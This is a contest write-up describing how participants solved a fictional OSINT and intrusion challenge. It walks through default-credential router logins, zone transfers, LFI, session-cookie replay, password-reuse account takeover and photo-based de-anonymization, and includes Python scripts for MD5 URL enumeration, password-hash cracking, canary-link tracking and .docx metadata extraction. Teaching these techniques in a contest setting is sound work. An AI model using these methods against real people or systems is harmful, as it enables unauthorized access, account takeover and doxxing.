July 16, 2014

Review of Competitive Intelligence Tasks

Today we'd like to talk about some practical aspects of gathering confidential data, using the tasks of the online Competitive Intelligence contest, held on May 15, 16 and 17, as examples.


This year's tasks were harder than last year's. A competitive intelligence researcher needs a wide range of skills and has to be comfortable with many tools and plugins, so we decided to make the tasks more challenging. The traditional requirements still apply, though: deductive thinking and the ability to connect scattered pieces of data.

1. Intro

According to the contest's plot, the participant is a new recruit to Anneximous, an underground group, and is assigned to find the email address of an ATH employee:

Hi, 
I heard you wanted to join the Anneximous group. That’s fine but you should prove you’re worth it. 
Rumor has it that feds are close to us. Those dumbasses from ATH (Bureau of Alcohol, Tobacco, Hackers and Cookies) must be spying on us! 
Teach one of the agents a lesson and maybe we’ll accept you. Get his email address.

We made the first task simple so as not to scare participants off: the address just needed to be googled.


Solved by: 82 participants

2. Reprisal against competitors

Now the participant is assigned to gather information about hackers from WWIdol, a group with no ethics whatsoever, and to hand them over to the leaders of ATH:

You succeeded, but that task was for kiddies. The point is we have been competing with a group called World White Idol for a long time. They are exceptionally bad guys without any ethics or respect for old people. It’s time to destroy those displeasing internet maniacs! 
The plan is to expose the members of this group to ATH and we’ll be alone on the throne! 
p.s. Actually, they’ve already started to hunt us
(http://athc.biz/docs/137b60bcec2014fcedca10cc5f89bfb4.docx), so be careful and go look for these scumbags:

2.1 Catching a script kiddie in Foursquare

Nickname: Schoolkid

About: The script kiddie hacks everything he sees and pays no attention to anonymity.

Development: Spotted hacking sites, always from the same IP address: 107.170.230.201.

Hint: New info has come up: the hacker connects from a public network. Thanks, Foursquare. Who the heck still uses this thing, anyway?

The script kiddie was caught attacking from 107.170.230.201. At that address we find a wireless router whose admin interface still uses the default credentials (admin:admin).



It's the Rodrigez family's router, located at 45.647801,-84.494360 (http://107.170.230.201/?page=geo.cgi).

The router's clickstream log shows many requests to Foursquare services.

In the application's requests to Foursquare we substitute the router's coordinates for the location data sent at check-in time:

POST /v2/users/updatelocation HTTP/1.1
Host: api.foursquare.com

ll=45.647801,-84.494360&[…]

GET /v2/venues/search?ll=45.647801,-84.494360&[…] HTTP/1.1
Host: api.foursquare.com

Then we enter Rodrigez in the venue search field and find the place…


 


 
… and the hacker we were looking for—Antony Kiddies.

Solved by: 6 participants

Points: 15

2.2. Looking for a Japanese businessman from WWIdol

Nickname: Japanese Businessman

About: Record of conviction: ATH case #126.

Hint: ATH keeps a single database of profiles for both Anneximous and WWIdol. Look deeper at athc.biz. Also, check out this Japanese character recognition (OCR) service: http://appsv.ocrgrid.org/nhocr/.

We already have a link to one ATH "case" (the .docx from the task introduction), and we know the number of the businessman's case file. Obviously the document naming scheme is where something useful will turn up.


Googling the hash from that link shows that it is MD5("123456.7"), i.e. a fixed prefix followed by the case number:

https://www.google.ru/search?q=137b60bcec2014fcedca10cc5f89bfb4

Case #126 therefore corresponds to MD5("123456.126") = d39558559e10be6b4e36ca6a5a55bf79, and the document we need is located at:

http://athc.biz/docs/d39558559e10be6b4e36ca6a5a55bf79.docx
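The naming scheme above is the whole weakness: a document "protected" only by an MD5 of a predictable string can be enumerated offline. The script below is an added example written for this review, not a tool from the contest; it assumes the prefix "123456" and the ".docx" suffix the write-up describes, and the hashes it checks itself are computed in the block rather than copied from the page.

```python
import hashlib

# Assumption taken from the write-up: files are named MD5("123456.<case number>").docx.
PREFIX = "123456"


def md5_hex(text: str) -> str:
    """Hex MD5 digest of a string, the scheme the target site uses for file names."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def case_hash(prefix: str, case_number: int) -> str:
    """File name stem for a given case number."""
    return md5_hex(f"{prefix}.{case_number}")


def find_case_number(document_hash: str, prefix: str = PREFIX, limit: int = 100000):
    """Recover the case number behind one document hash by brute force, or None."""
    target = document_hash.strip().lower()
    for n in range(limit + 1):
        if case_hash(prefix, n) == target:
            return n
    return None


def enumerate_documents(known_hashes, prefix: str = PREFIX, limit: int = 100000):
    """Map a whole set of observed hashes to case numbers in a single pass."""
    wanted = {h.strip().lower() for h in known_hashes}
    found = {}
    for n in range(limit + 1):
        h = case_hash(prefix, n)
        if h in wanted:
            found[h] = n
            if len(found) == len(wanted):
                break
    return found


def document_url(prefix: str, case_number: int, base: str = "http://athc.biz/docs/") -> str:
    """URL the site would serve a case file from."""
    return f"{base}{case_hash(prefix, case_number)}.docx"


if __name__ == "__main__":
    # The two hashes the write-up quotes; if its claim holds they resolve to cases 7 and 126.
    observed = ["137b60bcec2014fcedca10cc5f89bfb4", "d39558559e10be6b4e36ca6a5a55bf79"]
    for h, n in enumerate_documents(observed, limit=1000).items():
        print(h, "-> case", n, document_url(PREFIX, n))
    print("case 126 lives at", document_url(PREFIX, 126))
```

The point for a defender is the inverse: document identifiers must be random (a 128-bit value from a CSPRNG), not a hash of something guessable, because hashing adds no secrecy when the input space is tiny.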

By the way, the task was inspired by the widely discussed competitive intelligence case of "hacking" Gartner via the browser's address bar.

The document at athc.biz contains a photo of another document. Crop the title in the photo's top left-hand corner, enlarge it, run it through the OCR service from the hint and then through Google Translate, and the name appears: Haru Sakata.




And here's what happens if you don't enlarge the image:



The task is not solved yet; the participants should still find out the businessman's birthdate and place of work.

There are four Twitter users named Haru Sakata; three of those accounts were created by the organizers for the contest. A reverse image search in Google Images helps to tell the "real" account from the decoys, for instance by revealing that a profile photo actually belongs to a famous Japanese actor.



Solved by: 4 participants

Points: 20

2.3 Looking for a French lawyer

Nickname: Counsel

About: ATH case: http://athc.biz/docs/46a2934643bf3f80c530aee55195594d.docx.

ATH has plenty of data about this person: name, e-mail and even part of a photo. The photo was merely cropped in Word, so the full original is still inside the .docx (which is just a ZIP archive): zip://46a2934643bf3f80c530aee55195594d.docx/word/media/image2.emf

Now things are getting clearer: the metal structure in the background is no accident; it means the person has something to do with Paris.

However, 5 participants could not tell the real counsel from his "twins": decoy accounts with the same photo but no connection to Paris.



Solved by: 9 participants

Points: 20

2.4. Third-level domains and a Facebook account

Nickname: PakistaniChristian

About: Yo dawg, I heard you like subdomains, so I put three levels in yo subdomains so you can use subdomains while yo surf domains.

Hint: We got data that their domain is ftp.wwidol.com.

Hint 2: You are still looking in the wrong places. Why do you think there is an e-mail?

The one thing our answer checker didn't allow for was that participants (or the organizers) could mix up first and last names, after which none of the answers would match.

The task itself was quite simple: find the host ftp.wwidol.com (by brute-forcing third-level names or by requesting a zone transfer, since the wwidol.com name servers allow AXFR) and notice that its FTP server accepts anonymous logins. In the folder /images_upload/ there is a good old Thumbs.db from the Windows XP era.


This file holds thumbnails of the images the operating system cached, along with their file names, and Windows does not purge the entries for images that were later deleted from the folder.


The e-mail address won't help this time; we have to fall back on other de-anonymization techniques, in this case a search by the recovered photo.



Having the person's photo helps to tell the "real" accounts from the fakes.

Solved by: 5 participants

Points: 20

2.5. Breaking through to ATH

Nickname: johnsmith@athc.biz

Hint: We’ve managed to track the IP address ATH uses to access the internet. You may use this "exploit" to obtain the internal IP: http://net.ipcalf.com/.

Now the participants have to find information about the ATH employee John Smith. If you send an e-mail to johnsmith@athc.biz, you receive a reply with two hints.


The first: something like an antivirus gateway follows every link in incoming e-mail, to check it for malware or maybe for some other purpose.

The second: a NETGEAR N600 router faces the internet, and it has some interesting vulnerabilities: http://www.exploit-db.com/exploits/32883/


Here is what happens when we include a link to our own server in an e-mail to the "antivirus":


The router with the vulnerabilities from the hint is located at 162.243.77.131. Exploiting them gives, among other things, the admin password, even though the interface answers HTTP 401 to unauthenticated requests:



This router's firmware has more features: a logo attached to the page footer (as many ISPs do these days) and an SMB Manager that reaches into the internal network through a Java applet, provided you know an internal IP address.




The hint shows the way: the footer-logo form accepts HTML, and a modified version of the internal-IP "exploit" from the hint (the WebRTC trick behind net.ipcalf.com) planted there reports the internal address of whoever opens the page.





As a result:


We also received greetings from one of the participants. That was sweet.


Now we can try to get access to John Smith's computer and find the answers to the questions:



Solved by: 2 participants

Points: 35

Note: solving this task, like the following ones, unlocked new tasks.

3.1 Trying to strike up a conversation with a girl on a dating site

Nickname: Stripper

About: A "talky" girl who doesn't separate her private life from her job. Her probable location is 53.2054508, 63.6218262. She uses dating sites to find clients.

Two participants found the girl on Facebook and VKontakte.

In fact, we expected participants to find her on Badoo first, get her talking and make her spill her secrets. Only one participant added her as a friend (probably by accident), and nobody tried to talk to her. And of course there were several fake accounts that confused participants into choosing wrong answers.




Solved by: 2 participants

Points: 30

3.2 The iPhone gives away the Indian taxi driver

Nickname: IndianTaxi-driver

About: Counsel, his brother, should know everything about him. The password for the counsel's e-mail is ... wait … his birthday! What a freaking surprise!

To learn everything about the taxi driver, participants needed access to his brother's e-mail. Those who had solved task 2.3 already knew the counsel's birthdate, which was the password. The driver's own e-mail login and password were stored in his brother's mailbox,

and there we found out that he uses Apple devices.

The iCloud account used the same e-mail address and password (and even if it hadn't, access to the mailbox would have allowed a password reset). After logging in to iCloud, participants only had to locate the iPhone that the organizers had "sent" to Delhi.


Solved by: 2 participants

Points: 40

3.3. The Admin's having a little fun

Nickname: Admin

About: The admin of wwidol.com.

Google says there's a /.git/ directory on wwidol.com, and it contains the index and the config file. The config file's remote URL gives away the admin's GitHub login! What a stroke of luck!
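An exposed .git/ directory is worth checking for exactly this reason: .git/config is a plain INI-style file whose remote URL names the account the code was pushed from. The parser below is an added example for this write-up, not the organizers' code; the sample config it parses is constructed here (the account name wwidol-admin is invented), and the "DIRC" signature check is how one confirms that a fetched .git/index really is a git index rather than an error page.

```python
import re

# Constructed sample of what an exposed https://wwidol.com/.git/config could look like.
SAMPLE_GIT_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
[remote "origin"]
\turl = git@github.com:wwidol-admin/site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""

SECTION_RE = re.compile(r'^\s*\[([A-Za-z0-9.-]+)(?:\s+"([^"]*)")?\]\s*$')
KEY_RE = re.compile(r"^\s*([A-Za-z0-9-]+)\s*=\s*(.*?)\s*$")
GITHUB_RE = re.compile(r"github\.com[:/]([A-Za-z0-9-]+)/([A-Za-z0-9_.-]+?)(?:\.git)?/?$")


def looks_like_git_index(data: bytes) -> bool:
    """A real .git/index starts with the 'DIRC' signature; use it to confirm an exposed repo."""
    return data[:4] == b"DIRC"


def parse_git_config(text: str) -> dict:
    """Minimal parser for git's INI dialect: {'remote.origin': {'url': ...}, ...}."""
    config, section = {}, None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            # [remote "origin"] becomes the key "remote.origin", as git itself names it
            section = m.group(1).lower() + (f".{m.group(2)}" if m.group(2) else "")
            config.setdefault(section, {})
            continue
        m = KEY_RE.match(line)
        if m and section is not None:
            config[section][m.group(1).lower()] = m.group(2)
    return config


def remotes(config: dict) -> dict:
    """Remote name -> URL for every remote section that carries a url."""
    return {name.split(".", 1)[1]: body["url"]
            for name, body in config.items() if name.startswith("remote.") and "url" in body}


def github_identity(url: str):
    """(account, repository) from an SSH or HTTPS GitHub remote URL, else None."""
    m = GITHUB_RE.search(url)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    cfg = parse_git_config(SAMPLE_GIT_CONFIG)
    for name, url in remotes(cfg).items():
        print(name, url, "->", github_identity(url))
```

On a real engagement the same parser runs over whatever the web server returns for /.git/config; if the server also lists or serves .git/objects, the whole source history can be reconstructed, which is why the directory should be blocked at the web server and never deployed in the first place.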


Googling the nickname shows that the admin has two GitHub accounts, one for work and one just for fun. A repository under the second account contains an .htpasswd file as well as the IP address of the server the file was deployed to.

The IP address is the same as wwidol.com's, which means the admin keeps other files on the WWIdol server. But under which host name? A participant who had already made an AXFR request by this point would know about src.wwidol.com; otherwise it is high time to either brute-force third-level names or request a zone transfer.

The password behind that .htpasswd was easily guessed ("admin"), and it was enough to read everything about the admin in /about-me.txt.

Solved by: 3 participants

Points: 30

3.4. The admin and the cop are connected

Nickname: Cop

About: Admin and Cop are somehow connected. Errr, but how? Gosh..

Let's look at src.wwidol.com/note.txt. It contains a login, a password and the IP address of a web camera; in the camera's picture, a delivery invoice tells us everything about the cop.


Solved by: 3 participants

Points: 20

3.5. When an anonymizer doesn't help

Nickname: ParanoidHacker

Hint: The hacker uses an anonymizer, but his DNS requests absolutely don't. We know for sure that during the day the hacker is at his so-called "official" job, but he keeps doing nasty things from there. He's also running his own website, which doesn't look hackproof, so go and hack-prove it.

The hacker's mail is at the bottom of wwidol.com.


If we send him a link (as we did in task 2.5), he follows it through an anonymizer (the hint published on the third day mentions it). However, the DNS lookups for our domain are not anonymized: they arrive from the hacker's own network.

That network sits behind an office router with default credentials, admin:admin.
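Both this task and task 2.5 rely on the same trick: hand the target a link to a server you control and watch who comes to fetch it, in the web server log (the "antivirus" in 2.5) and in the authoritative DNS log (the leak here). The script below is an added example written for this review, not the organizers' tooling. It assumes a domain canary.example whose name server and web server we run, issues one random label per recipient so each hit is attributable, and correlates constructed Apache-style and BIND-style log lines (RFC 5737 addresses, not real traffic); the "leak" rule flags a target whose resolver address has nothing in common with the address that fetched the page.

```python
import re
import secrets

# Assumption: canary.example is a domain whose authoritative name server and web server we run.
CANARY_ZONE = "canary.example"

# vhost-prefixed combined log: <vhost> <client ip> - - [time] "request" status bytes "referer" "ua"
HTTP_LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# BIND query log line (older format without the "@0x..." client handle).
DNS_LOG_RE = re.compile(r"client (?P<ip>[0-9a-fA-F.:]+)#\d+: query: (?P<name>\S+) IN (?P<type>\S+)")


def issue_tokens(targets, token_fn=lambda: secrets.token_hex(4)):
    """One unguessable label per target, so a hit can be attributed to exactly one recipient."""
    return {target: token_fn() for target in targets}


def canary_url(token: str) -> str:
    return f"http://{token}.{CANARY_ZONE}/report.html"


def token_of(name: str):
    """Label directly under the canary zone, or None for unrelated names."""
    name = name.rstrip(".").lower()
    suffix = "." + CANARY_ZONE
    if not name.endswith(suffix):
        return None
    return name[: -len(suffix)].split(".")[-1]


def correlate(tokens, http_lines, dns_lines):
    """Attribute every DNS query and HTTP fetch of a canary to the target it was sent to."""
    by_token = {tok: target for target, tok in tokens.items()}
    hits = {target: {"http": [], "dns": []} for target in tokens}
    for line in dns_lines:
        m = DNS_LOG_RE.search(line)
        if m and token_of(m.group("name")) in by_token:
            hits[by_token[token_of(m.group("name"))]]["dns"].append(m.group("ip"))
    for line in http_lines:
        m = HTTP_LOG_RE.match(line)
        if m and token_of(m.group("host")) in by_token:
            hits[by_token[token_of(m.group("host"))]]["http"].append((m.group("ip"), m.group("ua")))
    return hits


def dns_leaks(hits):
    """Targets whose resolver address is unrelated to the address the page was fetched from.

    The fetch went through the anonymizer; the lookup did not, so the DNS source is the
    network to investigate (in the write-up: an office router with default credentials).
    Caveat: the DNS source is the target's resolver, which may be an ISP or corporate box."""
    leaks = {}
    for target, h in hits.items():
        http_ips = {ip for ip, _ in h["http"]}
        dns_ips = set(h["dns"])
        if http_ips and dns_ips and not (http_ips & dns_ips):
            leaks[target] = sorted(dns_ips)
    return leaks


# Constructed sample: fixed tokens and log lines (RFC 5737 addresses), not real traffic.
SAMPLE_TOKENS = {"johnsmith@athc.biz": "d41f7a21", "paranoid@wwidol.com": "9c0e55b3"}
SAMPLE_HTTP_LOG = [
    'd41f7a21.canary.example 203.0.113.44 - - [16/May/2014:11:03:52 +0400] "GET /report.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; LinkScanner/1.0)"',
    '9c0e55b3.canary.example 198.51.100.10 - - [17/May/2014:13:41:07 +0400] "GET /report.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    'canary.example 192.0.2.99 - - [17/May/2014:13:50:00 +0400] "GET /robots.txt HTTP/1.1" 404 0 "-" "curl/7.30"',
]
SAMPLE_DNS_LOG = [
    "16-May-2014 11:03:51.118 client 203.0.113.44#55012: query: d41f7a21.canary.example IN A + (192.0.2.53)",
    "17-May-2014 13:41:06.902 client 203.0.113.200#41287: query: 9c0e55b3.canary.example IN A + (192.0.2.53)",
]

if __name__ == "__main__":
    hits = correlate(SAMPLE_TOKENS, SAMPLE_HTTP_LOG, SAMPLE_DNS_LOG)
    for target, h in hits.items():
        print(target, canary_url(SAMPLE_TOKENS[target]), h)
    print("DNS leaks:", dns_leaks(hits))
```

The User-Agent captured on the HTTP side is what distinguishes the 2.5 case (an automated link scanner fetching on the recipient's behalf) from a human clicking through a proxy; in the sample the scanner resolves and fetches from the same address, so it is not reported as a leak.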


The router's logs show that the hacker visited homehekkers.com, a homemade site built on a WordPress template with the dewplayer plugin installed, which is vulnerable to local file inclusion (LFI):

What's more, homehekkers.com and wwidol.com are hosted on the same IP address (what a coincidence!), so the LFI lets us read /tmp/dump.sql on that server and learn everything about the hacker (hello, Moscow!).

Solved by: 0 participants

Points: 50

3.6. Somebody's leaking information to ATH

Nickname: rat

About: Here is a list of the potential rat's forum accounts: http://anneximous.com/rat.txt. Find me the rat!

Hint: Once upon a time there was and is Google mail. Stories were written and songs were composed 'bout Google mail remembering even the things one wouldn't suspect. And they all lived happily ever after. The question is who are "they"…?

The last task in this set was to find the ATH rat planted in Anneximous. Participants get a list of potential traitors in the form email:md5(pass). Only one of the hashes can be easily googled:

kevinreissen@wwidol.com:09d1d20bd495912ed5307a08510440d6 (Admin111)
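Googling a hash works only when someone has already published the pair; the general approach is to crack unsalted MD5 offline against a wordlist, which for a list of this shape takes milliseconds. The block below is an added example for this write-up, not the organizers' code. The suspect list is constructed: its first line is quoted from the write-up (which says it corresponds to Admin111), the other entries and the tiny wordlist are made up here and their hashes are computed in the block, so the example checks itself.

```python
import hashlib
import re

ENTRY_RE = re.compile(r"^([^:\s]+@[^:\s]+):([0-9a-fA-F]{32})$")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


# Constructed suspect list in the write-up's email:md5(pass) format. The first line is quoted
# from the write-up (which says it googles to Admin111); the rest are generated here.
SUSPECTS = [
    "kevinreissen@wwidol.com:09d1d20bd495912ed5307a08510440d6",
    "alice@wwidol.com:" + md5_hex("Summer2014"),
    "bob@wwidol.com:" + md5_hex("correct horse battery staple"),
    "garbage line that should be skipped",
]

# Constructed mini wordlist; a real run would use rockyou or a leak-derived list.
WORDLIST = ["123456", "password", "admin", "Admin111", "summer2014", "letmein"]


def parse_suspects(lines):
    """(email, hash) pairs; malformed lines are dropped rather than crashing the run."""
    entries = []
    for line in lines:
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append((m.group(1), m.group(2).lower()))
    return entries


def mangle(word: str):
    """Cheap rule set: as-is, Capitalized, UPPER, each with a few common suffixes."""
    seen = set()
    for base in (word, word.capitalize(), word.upper()):
        for suffix in ("", "1", "123", "!"):
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(entries, wordlist):
    """Unsalted MD5: hash every candidate once, then look each suspect's hash up in the table.

    Without a salt the cost is per candidate, not per suspect, which is why one table
    serves the whole list."""
    table = {}
    for word in wordlist:
        for cand in mangle(word):
            table.setdefault(md5_hex(cand), cand)
    return {email: table[h] for email, h in entries if h in table}


if __name__ == "__main__":
    for email, password in crack(parse_suspects(SUSPECTS), WORDLIST).items():
        print(email, "->", password)
```

The defensive reading is the usual one: a forum storing md5(pass) without a salt or a slow KDF hands an attacker every weak password in the table at once, and password reuse (here, the same password on Google Apps) turns a forum leak into a mailbox takeover.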

wwidol.com hosts its mail on Google Apps, which an nslookup of the domain's MX records reveals.

After logging in to this Gmail account, a contestant could find, in the account activity details Google keeps, an IMAP session from the device com.android.email, and with it the rat's IP address.

From there, the vulnerability in ATH's router (task 2.5) gave access to that computer on the internal network and to all the necessary information.


Solved by: 0 participants

Points: 20

4. Final stretch

We're coming to the end of our story about competitive intelligence researchers. The participants had to identify the ATH rat planted in WWIdol and the bosses of Anneximous and WWIdol.

4.1. wwidolRat

Nickname: wwidolRat

About: Info: the rat's report is at http://athc.biz/docs/f4dd947b925ef548fcdfd66789174033.docx.

Participants are given the rat's report. Its document metadata reveals an IP address, which once again lets us pull useful information from a computer in ATH's network.
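Both this report's metadata and the cropped photo in task 2.3 come out of the same fact: a .docx is a ZIP package, and its docProps/core.xml and word/media/ members survive whatever the author thinks they deleted or cropped. The script below is an added example written for this review, not the organizers' code; rather than download anything it builds a tiny constructed .docx in memory (the creator name, workstation name and the 10.10.7.15 address in it are invented) and then lists the media, pulls out the uncropped image and reads the core properties, scanning every XML part for IPv4 strings the way one would on the rat's report.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def build_sample_docx() -> bytes:
    """Constructed stand-in for a report from athc.biz; a .docx is just a ZIP package."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        "<cp:coreProperties "
        'xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
        'xmlns:dc="http://purl.org/dc/elements/1.1/">'
        "<dc:creator>rat</dc:creator>"
        "<cp:lastModifiedBy>ATH-WS-07</cp:lastModifiedBy>"
        "<dc:description>uploaded from 10.10.7.15</dc:description>"
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("docProps/core.xml", core)
        z.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n fake thumbnail")
        # Word stores the whole picture; the crop is only a display rectangle in document.xml
        z.writestr("word/media/image2.emf", b"\x01\x00\x00\x00 EMF: the full photo, not the crop shown on screen")
    return buf.getvalue()


def list_media(docx: bytes):
    """Every embedded picture, cropped or not."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        return sorted(n for n in z.namelist() if n.startswith("word/media/"))


def extract_member(docx: bytes, member: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        return z.read(member)


def core_properties(docx: bytes) -> dict:
    """docProps/core.xml fields (creator, lastModifiedBy, ...) with namespaces stripped."""
    root = ET.fromstring(extract_member(docx, "docProps/core.xml"))
    return {child.tag.split("}")[-1]: (child.text or "") for child in root}


def find_ipv4(docx: bytes):
    """Every IPv4-looking string in any text part of the package, with the part it came from."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for name in z.namelist():
            if name.endswith(".xml") or name.endswith(".rels"):
                for ip in IPV4_RE.findall(z.read(name).decode("utf-8", "replace")):
                    hits.append((name, ip))
    return hits


if __name__ == "__main__":
    doc = build_sample_docx()
    print("media:", list_media(doc))
    print("full photo bytes:", extract_member(doc, "word/media/image2.emf")[:20])
    print("core properties:", core_properties(doc))
    print("addresses:", find_ipv4(doc))
```

Anyone publishing documents should run the same inspection on their own files before release; Word's "Inspect Document" removes the properties, but cropped image data stays in the package unless the picture is compressed with "delete cropped areas".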


Moreover, there's an archive with some data on the rat's computer, but unfortunately it's password-protected.

It turned out that the rat has his own site, but for some reason ATH has blocked it.

If we query the server's IP address directly while naming the blocked hosts (kevin-donnalley.com and images.kevin-donnalley.com), we get the site:

Now we check its Thumbs.db and find the rat's base64-encoded Facebook ID:



Solved by: 2 participants

Points: 20

4.2. Seizing power in the band

Nickname: Anneximous Boss

About: empty

Hint: You can use SIP accounts 4000–4040 with the password "phdIV" at 107.170.92.105, but you still need to find the boss's nickname ;)

The rat's report contains a direct link to the folder holding the reports' images:

In this folder we find identifiers of other reports and can then try to fetch them.

Among them is a report on the bosses of Anneximous and WWIdol, containing a password and a traffic dump. In the dump we find this request:

POST /profile.php?PHPSESSID=055e9c961e311901050b261e16ef57aa HTTP/1.1
Host: anneximous.com
Cookie: PHPSESSID=055e9c961e311901050b261e16ef57aa;
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Replaying this request, with the captured PHPSESSID still valid, returns the name and SIP account of the Anneximous boss.



Solved by: 0 participants

Points: 55

4.3. Surprise

Nickname: Wwidol Boss

About: empty

The boss's SIP account seems unnecessary, since we already have all the data to fill in the answer form. But had any participant reached this task, called the boss (johanson@107.170.92.105) and examined the traffic, they would have noticed packets flowing from 128.199.236.23, the host boss.wwidol.com. The bosses of Anneximous and WWIdol turned out to be the same person. What a plot twist!

Now we can send the same request, with the same password, to wwidol.com (bosses are only human and reuse their passwords) and find his "nickname" on WWIdol.

P.S. No one reached this task, but one of the winners managed to guess the boss's nickname from the very first report and called him.

Solved by: 0 participants

Points: 30

The contest ended at 7:00 pm on May 17 (it lasted three days instead of the planned two), though some participants kept submitting answers after it was over. 301 participants registered for the contest and 82 solved the intro task. Other details are available in the table below.

* Not counting the 20 points for task 2.4

